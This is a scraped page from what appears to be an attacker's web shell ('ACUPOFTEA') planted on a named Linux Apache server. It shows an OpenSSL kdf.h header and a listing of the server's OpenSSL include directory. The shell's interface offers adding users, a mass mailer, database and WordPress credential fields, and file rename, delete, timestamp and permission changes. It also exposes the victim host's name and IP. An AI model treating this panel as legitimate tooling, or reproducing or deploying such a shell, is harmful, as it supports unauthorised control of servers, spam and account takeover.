System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
openssl
/
216.73.216.38
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
kdf.h
/* * Copyright 2016-2018 The OpenSSL Project Authors. All Rights Reserved. * * Licensed under the OpenSSL license (the "License"). You may not use * this file except in compliance with the License. You can obtain a copy * in the file LICENSE in the source distribution or at * https://www.openssl.org/source/license.html */ #ifndef HEADER_KDF_H # define HEADER_KDF_H # include <openssl/ossl_typ.h> # include <openssl/kdferr.h> # ifdef __cplusplus extern "C" { # endif # define EVP_KDF_PBKDF2 NID_id_pbkdf2 # define EVP_KDF_SCRYPT NID_id_scrypt # define EVP_KDF_TLS1_PRF NID_tls1_prf # define EVP_KDF_HKDF NID_hkdf # define EVP_KDF_SSHKDF NID_sshkdf # define EVP_KDF_KB NID_kbkdf # define EVP_KDF_KRB5KDF NID_krb5kdf # define EVP_KDF_SS NID_sskdf EVP_KDF_CTX *EVP_KDF_CTX_new_id(int id); void EVP_KDF_CTX_free(EVP_KDF_CTX *ctx); void EVP_KDF_reset(EVP_KDF_CTX *ctx); int EVP_KDF_ctrl(EVP_KDF_CTX *ctx, int cmd, ...); int EVP_KDF_vctrl(EVP_KDF_CTX *ctx, int cmd, va_list args); int EVP_KDF_ctrl_str(EVP_KDF_CTX *ctx, const char *type, const char *value); size_t EVP_KDF_size(EVP_KDF_CTX *ctx); int EVP_KDF_derive(EVP_KDF_CTX *ctx, unsigned char *key, size_t keylen); # define EVP_KDF_CTRL_SET_PASS 0x01 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_SALT 0x02 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_ITER 0x03 /* int */ # define EVP_KDF_CTRL_SET_MD 0x04 /* EVP_MD * */ # define EVP_KDF_CTRL_SET_KEY 0x05 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_MAXMEM_BYTES 0x06 /* uint64_t */ # define EVP_KDF_CTRL_SET_TLS_SECRET 0x07 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_RESET_TLS_SEED 0x08 # define EVP_KDF_CTRL_ADD_TLS_SEED 0x09 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_RESET_HKDF_INFO 0x0a # define EVP_KDF_CTRL_ADD_HKDF_INFO 0x0b /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_HKDF_MODE 0x0c /* int */ # define EVP_KDF_CTRL_SET_SCRYPT_N 0x0d /* uint64_t */ # define EVP_KDF_CTRL_SET_SCRYPT_R 0x0e /* uint32_t */ # define EVP_KDF_CTRL_SET_SCRYPT_P 0x0f /* uint32_t */ # define EVP_KDF_CTRL_SET_SSHKDF_XCGHASH 0x10 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_SSHKDF_SESSION_ID 0x11 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_SSHKDF_TYPE 0x12 /* int */ # define EVP_KDF_CTRL_SET_KB_MODE 0x13 /* int */ # define EVP_KDF_CTRL_SET_KB_MAC_TYPE 0x14 /* int */ # define EVP_KDF_CTRL_SET_CIPHER 0x15 /* EVP_CIPHER * */ # define EVP_KDF_CTRL_SET_KB_INFO 0x16 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_KB_SEED 0x17 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_KRB5KDF_CONSTANT 0x18 /* unsigned char *, size_t */ # define EVP_KDF_CTRL_SET_SSKDF_INFO 0x19 /* unsigned char *, size_t */ # define EVP_KDF_HKDF_MODE_EXTRACT_AND_EXPAND 0 # define EVP_KDF_HKDF_MODE_EXTRACT_ONLY 1 # define EVP_KDF_HKDF_MODE_EXPAND_ONLY 2 #define EVP_KDF_SSHKDF_TYPE_INITIAL_IV_CLI_TO_SRV 65 #define EVP_KDF_SSHKDF_TYPE_INITIAL_IV_SRV_TO_CLI 66 #define EVP_KDF_SSHKDF_TYPE_ENCRYPTION_KEY_CLI_TO_SRV 67 #define EVP_KDF_SSHKDF_TYPE_ENCRYPTION_KEY_SRV_TO_CLI 68 #define EVP_KDF_SSHKDF_TYPE_INTEGRITY_KEY_CLI_TO_SRV 69 #define EVP_KDF_SSHKDF_TYPE_INTEGRITY_KEY_SRV_TO_CLI 70 #define EVP_KDF_KB_MODE_COUNTER 0 #define EVP_KDF_KB_MODE_FEEDBACK 1 #define EVP_KDF_KB_MAC_TYPE_HMAC 0 #define EVP_KDF_KB_MAC_TYPE_CMAC 1 /**** The legacy PKEY-based KDF API follows. ****/ # define EVP_PKEY_CTRL_TLS_MD (EVP_PKEY_ALG_CTRL) # define EVP_PKEY_CTRL_TLS_SECRET (EVP_PKEY_ALG_CTRL + 1) # define EVP_PKEY_CTRL_TLS_SEED (EVP_PKEY_ALG_CTRL + 2) # define EVP_PKEY_CTRL_HKDF_MD (EVP_PKEY_ALG_CTRL + 3) # define EVP_PKEY_CTRL_HKDF_SALT (EVP_PKEY_ALG_CTRL + 4) # define EVP_PKEY_CTRL_HKDF_KEY (EVP_PKEY_ALG_CTRL + 5) # define EVP_PKEY_CTRL_HKDF_INFO (EVP_PKEY_ALG_CTRL + 6) # define EVP_PKEY_CTRL_HKDF_MODE (EVP_PKEY_ALG_CTRL + 7) # define EVP_PKEY_CTRL_PASS (EVP_PKEY_ALG_CTRL + 8) # define EVP_PKEY_CTRL_SCRYPT_SALT (EVP_PKEY_ALG_CTRL + 9) # define EVP_PKEY_CTRL_SCRYPT_N (EVP_PKEY_ALG_CTRL + 10) # define EVP_PKEY_CTRL_SCRYPT_R (EVP_PKEY_ALG_CTRL + 11) # define EVP_PKEY_CTRL_SCRYPT_P (EVP_PKEY_ALG_CTRL + 12) # define EVP_PKEY_CTRL_SCRYPT_MAXMEM_BYTES (EVP_PKEY_ALG_CTRL + 13) # define EVP_PKEY_HKDEF_MODE_EXTRACT_AND_EXPAND \ EVP_KDF_HKDF_MODE_EXTRACT_AND_EXPAND # define EVP_PKEY_HKDEF_MODE_EXTRACT_ONLY \ EVP_KDF_HKDF_MODE_EXTRACT_ONLY # define EVP_PKEY_HKDEF_MODE_EXPAND_ONLY \ EVP_KDF_HKDF_MODE_EXPAND_ONLY # define EVP_PKEY_CTX_set_tls1_prf_md(pctx, md) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_TLS_MD, 0, (void *)(md)) # define EVP_PKEY_CTX_set1_tls1_prf_secret(pctx, sec, seclen) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_TLS_SECRET, seclen, (void *)(sec)) # define EVP_PKEY_CTX_add1_tls1_prf_seed(pctx, seed, seedlen) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_TLS_SEED, seedlen, (void *)(seed)) # define EVP_PKEY_CTX_set_hkdf_md(pctx, md) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_HKDF_MD, 0, (void *)(md)) # define EVP_PKEY_CTX_set1_hkdf_salt(pctx, salt, saltlen) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_HKDF_SALT, saltlen, (void *)(salt)) # define EVP_PKEY_CTX_set1_hkdf_key(pctx, key, keylen) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_HKDF_KEY, keylen, (void *)(key)) # define EVP_PKEY_CTX_add1_hkdf_info(pctx, info, infolen) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_HKDF_INFO, infolen, (void *)(info)) # define EVP_PKEY_CTX_hkdf_mode(pctx, mode) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_HKDF_MODE, mode, NULL) # define EVP_PKEY_CTX_set1_pbe_pass(pctx, pass, passlen) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_PASS, passlen, (void *)(pass)) # define EVP_PKEY_CTX_set1_scrypt_salt(pctx, salt, saltlen) \ EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_SCRYPT_SALT, saltlen, (void *)(salt)) # define EVP_PKEY_CTX_set_scrypt_N(pctx, n) \ EVP_PKEY_CTX_ctrl_uint64(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_SCRYPT_N, n) # define EVP_PKEY_CTX_set_scrypt_r(pctx, r) \ EVP_PKEY_CTX_ctrl_uint64(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_SCRYPT_R, r) # define EVP_PKEY_CTX_set_scrypt_p(pctx, p) \ EVP_PKEY_CTX_ctrl_uint64(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_SCRYPT_P, p) # define EVP_PKEY_CTX_set_scrypt_maxmem_bytes(pctx, maxmem_bytes) \ EVP_PKEY_CTX_ctrl_uint64(pctx, -1, EVP_PKEY_OP_DERIVE, \ EVP_PKEY_CTRL_SCRYPT_MAXMEM_BYTES, maxmem_bytes) # ifdef __cplusplus } # endif #endif
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-10-10 10:57:14
..
DIR
-
drwxr-xr-x
2025-10-31 10:57:17
aes.h
text/x-c
3.27 KB
-rw-r--r--
2024-10-09 01:38:54
asn1.h
text/x-c
32.84 KB
-rw-r--r--
2024-10-09 01:38:54
asn1_mac.h
text/plain
395 B
-rw-r--r--
2024-10-09 01:38:54
asn1err.h
text/x-c
14.34 KB
-rw-r--r--
2024-10-09 01:38:54
asn1t.h
text/x-c
32.17 KB
-rw-r--r--
2024-10-09 01:38:54
async.h
text/x-c
2.34 KB
-rw-r--r--
2024-10-09 01:38:54
asyncerr.h
text/x-c
1.29 KB
-rw-r--r--
2024-10-09 01:38:54
bio.h
text/x-Algol68
34.09 KB
-rw-r--r--
2024-10-09 01:38:54
bioerr.h
text/x-Algol68
6.25 KB
-rw-r--r--
2024-10-09 01:38:54
blowfish.h
text/x-c
1.8 KB
-rw-r--r--
2024-10-09 01:38:54
bn.h
text/x-c
21.62 KB
-rw-r--r--
2024-10-09 01:38:54
bnerr.h
text/x-c
4.85 KB
-rw-r--r--
2024-10-09 01:38:54
buffer.h
text/x-c
1.56 KB
-rw-r--r--
2024-10-09 01:38:54
buffererr.h
text/x-c
820 B
-rw-r--r--
2024-10-09 01:38:54
camellia.h
text/x-c
3.1 KB
-rw-r--r--
2024-10-09 01:38:54
cast.h
text/x-c
1.63 KB
-rw-r--r--
2024-10-09 01:38:54
cmac.h
text/x-c
1.04 KB
-rw-r--r--
2024-10-09 01:38:54
cms.h
text/x-c
16 KB
-rw-r--r--
2024-10-09 01:38:54
cmserr.h
text/x-c
10.9 KB
-rw-r--r--
2024-10-09 01:38:54
comp.h
text/x-c
1.3 KB
-rw-r--r--
2024-10-09 01:38:54
comperr.h
text/x-c
1.18 KB
-rw-r--r--
2024-10-09 01:38:54
conf.h
text/x-c
5.47 KB
-rw-r--r--
2024-10-09 01:38:54
conf_api.h
text/x-c
1.27 KB
-rw-r--r--
2024-10-09 01:38:54
conferr.h
text/x-c
3.35 KB
-rw-r--r--
2024-10-09 01:38:54
crypto.h
text/x-c
16.93 KB
-rw-r--r--
2024-10-09 01:38:54
cryptoerr.h
text/x-c
2.21 KB
-rw-r--r--
2024-10-09 01:38:54
ct.h
text/x-c
15.5 KB
-rw-r--r--
2024-10-09 01:38:54
cterr.h
text/x-c
3.39 KB
-rw-r--r--
2024-10-09 01:38:54
des.h
text/x-Algol68
7.45 KB
-rw-r--r--
2024-10-09 01:38:54
dh.h
text/x-c
13.42 KB
-rw-r--r--
2024-10-09 01:38:54
dherr.h
text/x-c
4.31 KB
-rw-r--r--
2024-10-09 01:38:54
dsa.h
text/x-c
9.87 KB
-rw-r--r--
2024-10-09 01:38:54
dsaerr.h
text/x-c
3.27 KB
-rw-r--r--
2024-10-09 01:38:54
dtls1.h
text/x-c
1.54 KB
-rw-r--r--
2024-10-09 01:38:54
e_os2.h
text/x-c
8.68 KB
-rw-r--r--
2024-10-09 01:38:54
ebcdic.h
text/x-c
924 B
-rw-r--r--
2024-10-09 01:38:54
ec.h
text/x-c
62.17 KB
-rw-r--r--
2024-10-09 01:38:54
ecdh.h
text/x-c
358 B
-rw-r--r--
2024-10-09 01:38:54
ecdsa.h
text/x-c
358 B
-rw-r--r--
2024-10-09 01:38:54
ecerr.h
text/x-c
16.25 KB
-rw-r--r--
2024-10-09 01:38:54
engine.h
text/x-c
33.85 KB
-rw-r--r--
2024-10-09 01:38:54
engineerr.h
text/x-Algol68
5.32 KB
-rw-r--r--
2024-10-09 01:38:54
err.h
text/x-Algol68
11 KB
-rw-r--r--
2024-10-09 01:38:54
evp.h
text/x-c
75.13 KB
-rw-r--r--
2024-10-09 01:38:54
evperr.h
text/x-c
11.79 KB
-rw-r--r--
2024-10-09 01:38:54
fips.h
text/x-c
9.74 KB
-rw-r--r--
2024-10-09 01:38:54
fips_rand.h
text/x-c
7 KB
-rw-r--r--
2024-10-09 01:38:54
hmac.h
text/x-c
1.55 KB
-rw-r--r--
2024-10-09 01:38:54
idea.h
text/x-c
2.05 KB
-rw-r--r--
2024-10-09 01:38:54
kdf.h
text/x-Algol68
7.39 KB
-rw-r--r--
2024-10-09 01:38:54
kdferr.h
text/x-c
4.68 KB
-rw-r--r--
2024-10-09 01:38:54
lhash.h
text/x-c
9.05 KB
-rw-r--r--
2024-10-09 01:38:54
md2.h
text/x-c
1.03 KB
-rw-r--r--
2024-10-09 01:38:54
md4.h
text/x-c
1.29 KB
-rw-r--r--
2024-10-09 01:38:54
md5.h
text/x-c
1.29 KB
-rw-r--r--
2024-10-09 01:38:54
mdc2.h
text/x-c
1.03 KB
-rw-r--r--
2024-10-09 01:38:54
modes.h
text/x-c
10.23 KB
-rw-r--r--
2024-10-09 01:38:54
obj_mac.h
text/plain
213.37 KB
-rw-r--r--
2024-10-09 01:38:54
objects.h
text/x-c
6.48 KB
-rw-r--r--
2024-10-09 01:38:54
objectserr.h
text/x-c
1.29 KB
-rw-r--r--
2024-10-09 01:38:54
ocsp.h
text/x-c
14.95 KB
-rw-r--r--
2024-10-09 01:38:54
ocsperr.h
text/x-c
3.28 KB
-rw-r--r--
2024-10-09 01:38:54
opensslconf-x86_64.h
text/x-c
4.78 KB
-rw-r--r--
2024-10-09 01:39:34
opensslconf.h
text/x-c
1.54 KB
-rw-r--r--
2024-10-09 01:39:34
opensslv.h
text/x-c
4.01 KB
-rw-r--r--
2024-10-09 01:38:54
ossl_typ.h
text/x-c
6.16 KB
-rw-r--r--
2024-10-09 01:38:54
pem.h
text/x-c
15.11 KB
-rw-r--r--
2024-10-09 01:38:54
pem2.h
text/plain
415 B
-rw-r--r--
2024-10-09 01:38:54
pemerr.h
text/x-c
5.1 KB
-rw-r--r--
2024-10-09 01:38:54
pkcs12.h
text/x-c
9.64 KB
-rw-r--r--
2024-10-09 01:38:54
pkcs12err.h
text/x-Algol68
3.66 KB
-rw-r--r--
2024-10-09 01:38:54
pkcs7.h
text/x-c
11.32 KB
-rw-r--r--
2024-10-09 01:38:54
pkcs7err.h
text/x-c
4.99 KB
-rw-r--r--
2024-10-09 01:38:54
rand.h
text/x-c
2.3 KB
-rw-r--r--
2024-10-09 01:38:54
rand_drbg.h
text/x-c
4.65 KB
-rw-r--r--
2024-10-09 01:38:54
randerr.h
text/x-c
4.58 KB
-rw-r--r--
2024-10-09 01:38:54
rc2.h
text/x-c
1.5 KB
-rw-r--r--
2024-10-09 01:38:54
rc4.h
text/x-c
825 B
-rw-r--r--
2024-10-09 01:38:54
rc5.h
text/x-c
1.94 KB
-rw-r--r--
2024-10-09 01:38:54
ripemd.h
text/x-c
1.21 KB
-rw-r--r--
2024-10-09 01:38:54
rsa.h
text/x-c
21.82 KB
-rw-r--r--
2024-10-09 01:38:54
rsaerr.h
text/x-Algol68
9.59 KB
-rw-r--r--
2024-10-09 01:38:54
safestack.h
text/x-c
7.95 KB
-rw-r--r--
2024-10-09 01:38:54
seed.h
text/x-c
3.4 KB
-rw-r--r--
2024-10-09 01:38:54
sha.h
text/x-c
3.74 KB
-rw-r--r--
2024-10-09 01:38:54
srp.h
text/x-c
3.74 KB
-rw-r--r--
2024-10-09 01:38:54
srtp.h
text/x-c
1.29 KB
-rw-r--r--
2024-10-09 01:38:54
ssl.h
text/x-c
108.55 KB
-rw-r--r--
2024-10-09 01:39:22
ssl2.h
text/x-c
542 B
-rw-r--r--
2024-10-09 01:38:54
ssl3.h
text/x-c
14.36 KB
-rw-r--r--
2024-10-09 01:38:54
sslerr.h
text/x-c
45.58 KB
-rw-r--r--
2024-10-09 01:38:54
stack.h
text/x-c
3.02 KB
-rw-r--r--
2024-10-09 01:38:54
store.h
text/x-c
10.94 KB
-rw-r--r--
2024-10-09 01:38:54
storeerr.h
text/x-c
4.3 KB
-rw-r--r--
2024-10-09 01:38:54
symhacks.h
text/plain
1.28 KB
-rw-r--r--
2024-10-09 01:38:54
tls1.h
text/x-c
70.79 KB
-rw-r--r--
2024-10-09 01:38:54
ts.h
text/x-c
21.9 KB
-rw-r--r--
2024-10-09 01:38:54
tserr.h
text/x-c
6.59 KB
-rw-r--r--
2024-10-09 01:38:54
txt_db.h
text/x-c
1.63 KB
-rw-r--r--
2024-10-09 01:38:54
ui.h
text/x-c
15.68 KB
-rw-r--r--
2024-10-09 01:38:54
uierr.h
text/x-c
2.67 KB
-rw-r--r--
2024-10-09 01:38:54
whrlpool.h
text/x-c
1.34 KB
-rw-r--r--
2024-10-09 01:38:54
x509.h
text/x-c
42.31 KB
-rw-r--r--
2024-10-09 01:38:54
x509_vfy.h
text/x-c
31.69 KB
-rw-r--r--
2024-10-09 01:38:54
x509err.h
text/x-c
6.64 KB
-rw-r--r--
2024-10-09 01:38:54
x509v3.h
text/x-Algol68
32.66 KB
-rw-r--r--
2024-10-09 01:38:54
x509v3err.h
text/x-c
8.57 KB
-rw-r--r--
2024-10-09 01:38:54
~ ACUPOFTEA - mail.ontime-ae.com